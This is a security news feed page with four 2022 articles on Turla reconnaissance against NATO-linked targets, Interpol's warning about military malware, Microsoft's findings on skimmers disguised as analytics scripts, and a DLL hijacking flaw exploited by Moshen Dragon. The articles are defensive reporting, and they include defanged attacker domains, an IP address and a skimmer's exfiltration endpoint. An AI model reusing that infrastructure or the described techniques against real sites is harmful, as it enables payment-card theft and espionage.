🔒
There are new articles available, click to refresh the page.
Today — 24 May 2022Security Affairs

Russia-linked Turla APT targets Austria, Estonia, and NATO platform

23 May 2022 at 22:03

Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College.

Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance and espionage campaign conducted by Russia-linked Turla APT aimed at the Baltic Defense College, the Austrian Economic Chamber (involved in government decision-making such as economic sanctions) and NATO’s eLearning platform JDAL (Joint Advanced Distributed Learning).

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTONhas been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and also includes the Pentagon, the Swiss defense firm RUAG, US Department of State, European government entities and the US Central Command.

SEKOIA researchers started their investigation after the publication of Google’s Threat Analysis Group (TAG)’s report “Update on cyber activity in Eastern Europe” which detailed the activity of nation-state actors against Eastern Europe.

The researchers investigated the TURLA’s infrastructures starting from the domains in the TAG report:

  • wkoinfo.webredirect[.]org
  • jadlactnato.webredirect[.]org

The first domain exposed 45.153.241[.]162 which can be linked to the domain baltdefcol.webredirect[.]org typosquatting www.baltdefcol.org, Baltic Defense College’s website.

Experts discovered the word document “War Bulletin April 27, 19:00 CET” in every directory, the document included an external PNG file dubbed logo.png which was not reachable during the investigation.

The document does not contain any malicious macros, a circumstance that suggests the PNG is used to for reconnaissance purposes.

“It is quite interesting that the request to the file is performed via the HTTP protocol and not an SMB inclusion. Therefore, this campaign does not leverage any malicious code but has been used for reconnaissance purposes only.” reads the analysis published by the experts. “Thanks to the HTTP request done by the document to its own controlled server, the attacker can get the version and the type of Word application used by the victim – which can be an interesting info to send a tailored exploit for the specific Microsoft Word version. Moreover, the attacker can grab the IP address of the victim which can be also an interesting selector to monitor the victim’s communications via TURLA’s SIGINT capabilities.”

The researchers shared Indicators of Compromise (IoCs) for these attacks along with Yara rule.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)

The post Russia-linked Turla APT targets Austria, Estonia, and NATO platform appeared first on Security Affairs.

Nation-state malware could become a commodity on dark web soon, Interpol warns

24 May 2022 at 09:06

Interpol Secretary warns that nation-state malware will become available on the cybercrime underground in a couple of years.

Interpol Secretary General Jurgen Stock declared that nation-state malwre will become available on the darknet in a couple of years.

In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide.

Threat actors could perform reverse engineering of military-made malicious code and use their own versions in attacks in the wild. The scenario also opens the doors to false flag operations, nation-state actors could have access to cyber weapons used in the conflict and use them in attacks in the wild making the attribution impossible.

“That is a major concern in the physical world — weapons that are used on the battlefield and tomorrow will be used by organized crime groups,” said Jurgen Stock, the Interpol secretary general during a CNBC-moderated panel at the World Economic Forum in Davos, Switzerland, Monday.

“The same applies for the digital weapons that, maybe today are used by the military, developed by military, and tomorrow will be available for criminals,” he explained.

During the first couple of months after the Russian invasion of Ukraine, security firms have observed multiple attacks against Ukrainian government entities and organizations. Russia-linked APT groups used wipers to destroy the target systems, in some cases, these attacks hit companies operating in other regions, such as VIASAT.

Early this month, the European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat, on February 24.

This cyberattack caused communication outages and disruptions in Ukraine, it also impacted several EU Member States. 5,800 Enercon wind turbines in Germany were unreachable due to the spillover from this attack. Security researchers at SentinelLabs who investigated the attack spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers and modems

Stock urged strong cooperation between governments and law enforcement authorities to prevent nation-state malware will proliferate on the dark web.

“On the one hand, we are aware of what’s going on — on the other hand, we need the data, which are in the private sector,” Stock said. “We need your [cyber breach] reports. Without your reports, we are blind.”

“That is a gap we need to close together, not just law enforcement that require that we build bridges between our siloes, the islands of information.”

More exposed are critical infrastructure and supply chain, it is essential to increase their level of security.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, nation-state malware)

The post Nation-state malware could become a commodity on dark web soon, Interpol warns appeared first on Security Affairs.

Microsoft warns of new highly evasive web skimming campaigns

24 May 2022 at 13:16

Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection.

Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection.

The threat actors obfuscated the skimming script by encoding it in PHP, which, in turn, was embedded in an image file, using this trick the code is executed when a website’s index page is loaded.

The experts also observed compromised web applications injected with malicious JavaScript masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts. Some skimming scripts also included anti-debugging mechanisms.

The term web skimming refers to the criminal practice to harvest payment information of visitors of a website during checkout. Crooks use to exploit vulnerabilities in e-commerce platforms and CMSs to inject the skimming script into the page of the e-store. In some cases, attackers can exploit vulnerabilities in installed third-party plugins and themes to inject malicious scripts.

web skimming attack-overview.png

“During our research, we came across two instances of malicious image files being uploaded to a Magento-hosted server. Both images contained a PHP script with a Base64-encoded JavaScript, and while they had identical JavaScript code, they slightly differed in their PHP implementation.” reads the analysis published by Microsoft. “The first image, disguised as a favicon (also known as a shortcut or URL icon), was available on VirusTotal, while the other one was a typical web image file discovered by our team.”

Microsoft also observed attackers masquerading as Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts to avoid raising suspicion.

The attackers place a Base64-encoded string inside a spoofed Google Tag Manager code. This string decoded to trafficapps[.]business/data[.]php?p=form.

web skimming attack-overview 2
Encoded skimming script in a spoofed Google Analytics code (Source Microsoft)

Experts noticed that the attackers behind the Meta Pixel spoofing used newly registered domains (NRDs) using HTTPS.

“Given the increasingly evasive tactics employed in skimming campaigns, organizations should ensure that their e-commerce platforms, CMSs, and installed plugins are up to date with the latest security patches and that they only download and use third-party plugins and services from trusted sources,” Microsoft concludes.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, web skimming attacks)

The post Microsoft warns of new highly evasive web skimming campaigns appeared first on Security Affairs.

Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT

24 May 2022 at 18:18

Trend Micro addressed a DLL hijacking issue in Trend Micro Security actively exploited by a China-linked threat group to deploy malware.

Trend Micro addressed a DLL hijacking flaw in Trend Micro Security that a China-linked threat actor actively exploited to deploy malware.

In early May, SentinelOne researchers observed a China-linked APT group, tracked as Moshen Dragon, targeting the telecommunication sector in Central Asia with ShadowPad and PlugX malware.

Experts observed an overlap between the TTPs of the Moshen Dragon group with the ones of the Chinese Nomad Panda (aka RedFoxtrot).

The researchers state that Moshen Dragon deployed five different malware triads to use DLL search order hijacking to sideload ShadowPad and PlugX variants. The cyperespionage group also uses additional tools, including an LSA notification package and the GUNTERS passive backdoor.

SentinelOne experts reported that Moshen Dragon focused on the hijacking of programs belonging to security vendors, including Symantec, TrendMicro, BitDefender, McAfee and Kaspersky.

The hijacked DLL is used to decrypt and load the final payload, stored in a file residing in the same folder.

The Moshen Dragon’s activity analysis led to the discovery of several payloads uploaded to VirusTotal, some of which were the ‘PlugX Talisman variant’.

Moshen Dragon impacket

SentinelOne detailed lateral movements, credential harvesting, and data exfiltration performed by the threat actors by exploiting the flaw in the popular security solutions.

Trend Micro confirmed that it is aware of Moshen Dragon’s activity and its ability to exploit security solutions, including its software, to deploy malware.

“Trend Micro is aware of some research that was published on May 2, 2022, regarding a purported Central-Asian-based threat actor dubbed “Moshen Dragon” that had deployed malware clusters that attempted to hijack various popular security products, including one from Trend Micro.” reads the advisory published by Trend Micro. “For Trend Micro Security (Consumer), a fix was deployed via Trend Micro’s ActiveUpdate (AU) on May 19, 2022, and any user with an active internet connection should receive the update shortly if they have not yet already received it.”

At the time of this writing, it is not clear if other security vendors impacted by the issue have addressed the issue affecting their products.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

The post Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT appeared first on Security Affairs.

  • There are no more articles
❌